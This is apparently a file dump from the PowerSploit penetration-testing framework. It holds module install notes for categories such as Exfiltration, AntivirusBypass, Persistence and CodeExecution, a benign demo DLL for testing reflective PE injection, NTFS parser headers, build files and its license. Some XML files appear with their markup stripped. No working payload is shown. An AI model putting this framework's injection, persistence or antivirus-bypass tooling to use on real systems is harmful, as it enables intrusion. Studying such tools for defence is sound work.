rax 19 | 20 | ; Store the result 21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS 22 | mov [rcx], rax 23 | 24 | ; Restore stack 25 | mov rsp, rbx 26 | pop rbx 27 | ret 28 | -------------------------------------------------------------------------------- /Recon/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Recon` 7 | 8 | To see the commands imported, type `Get-Command -Module Recon` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /PETools/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire PETools folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module PETools` 7 | 8 | To see the commands imported, type `Get-Command -Module PETools` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /CodeExecution/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module CodeExecution` 7 | 8 | To see the commands imported, type `Get-Command -Module CodeExecution` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /Exfiltration/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Exfiltration` 7 | 8 | To see the commands imported, type `Get-Command -Module Exfiltration` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | using namespace std; 5 | 6 | BOOL APIENTRY DllMain( HMODULE hModule, 7 | DWORD ul_reason_for_call, 8 | LPVOID lpReserved 9 | ) 10 | { 11 | ofstream myfile; 12 | 13 | switch (ul_reason_for_call) 14 | { 15 | case DLL_PROCESS_ATTACH: 16 | _mkdir("c:\\ReflectiveLoaderTest"); 17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt"); 18 | myfile << "DllMain successfully called.\n"; 19 | myfile.close(); 20 | break; 21 | case DLL_THREAD_ATTACH: 22 | case DLL_THREAD_DETACH: 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | } 26 | return TRUE; 27 | } 28 | 29 | -------------------------------------------------------------------------------- /AntivirusBypass/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module AntivirusBypass` 7 | 8 | To see the commands imported, type `Get-Command -Module AntivirusBypass` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /ReverseEngineering/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ReverseEngineering folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ReverseEngineering` 7 | 8 | To see the commands imported, type `Get-Command -Module ReverseEngineering` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /ScriptModification/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ScriptModification` 7 | 8 | To see the commands imported, type `Get-Command -Module ScriptModification` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h: -------------------------------------------------------------------------------- 1 | // The following ifdef block is the standard way of creating macros which make exporting 2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS 3 | // symbol defined on the command line. This symbol should not be defined on any project 4 | // that uses this DLL. This way any other project whose source files include this file see 5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols 6 | // defined with this macro as being exported. 7 | #ifdef DEMODLL_EXPORTS 8 | #define DEMODLL_API __declspec(dllexport) 9 | #else 10 | #define DEMODLL_API __declspec(dllimport) 11 | #endif 12 | 13 | using namespace std; 14 | 15 | extern "C" __declspec( dllexport ) char* StringFunc(); 16 | extern "C" __declspec( dllexport ) void VoidFunc(); 17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc(); -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32 15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Capstone/README: -------------------------------------------------------------------------------- 1 | This module has three dependencies: 2 | * lib\x86\libcapstone.dll (the 32-bit unmanaged Capstone library) 3 | * lib\x64\libcapstone.dll (the 64-bit unmanaged Capstone library) 4 | * lib\capstone.dll (the managed C# bindings to the Capstone Framework) 5 | 6 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 7 | 8 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 9 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 10 | 11 | To use the module, type `Import-Module Capstone` 12 | 13 | To see the commands imported, type `Get-Command -Module Capstone` 14 | 15 | For help on each individual command, Get-Help is your friend. 16 | 17 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /Persistence/Persistence.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Persistence.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Persistence Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # Cmdlets to export from this module 28 | CmdletsToExport = '*' 29 | 30 | # List of all modules packaged with this module. 31 | ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) 32 | 33 | # List of all files packaged with this module 34 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', 35 | 'New-UserPersistenceOptions.ps1', 'Usage.md' 36 | 37 | } 38 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | // dllmain.cpp : Defines the entry point for the DLL application. 19 | #include "stdafx.h" 20 | 21 | BOOL APIENTRY DllMain( HMODULE hModule, 22 | DWORD ul_reason_for_call, 23 | LPVOID lpReserved 24 | ) 25 | { 26 | switch (ul_reason_for_call) 27 | { 28 | case DLL_PROCESS_ATTACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | case DLL_PROCESS_DETACH: 32 | break; 33 | } 34 | return TRUE; 35 | } 36 | 37 | -------------------------------------------------------------------------------- /PETools/Get-LibSymbols.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SymbolTypeView 6 | 7 | COFF.SymbolInfo 8 | 9 | 10 | 11 | 12 | 13 | 14 | SymbolType 15 | 16 | 17 | Module 18 | 19 | 20 | DecoratedName 21 | 22 | 23 | UndecoratedName 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32 16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64 17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64 18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32 19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32 20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64 21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32 16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64 17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64 18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32 19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32 20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64 21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32 16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64 17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64 18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32 19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32 20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64 21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32 16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64 17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64 18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32 19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32 20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64 21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | PowerSploit is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2012, Matthew Graeber 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 15 | 16 | 17 | -------------------------------------------------------------------------------- /ReverseEngineering/ProcessModuleTrace.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessModuleTraceView 6 | 7 | LOADED_MODULE 8 | 9 | 10 | 11 | 12 | 13 | 14 | TimeCreated 15 | 16 | 17 | ProcessId 18 | 19 | 20 | FileName 21 | 22 | 23 | 24 | "0x$($_.ImageBase.ToString("X$([IntPtr]::Size * 2)"))" 25 | 26 | 27 | ImageSize 28 | 0x{0:X8} 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source 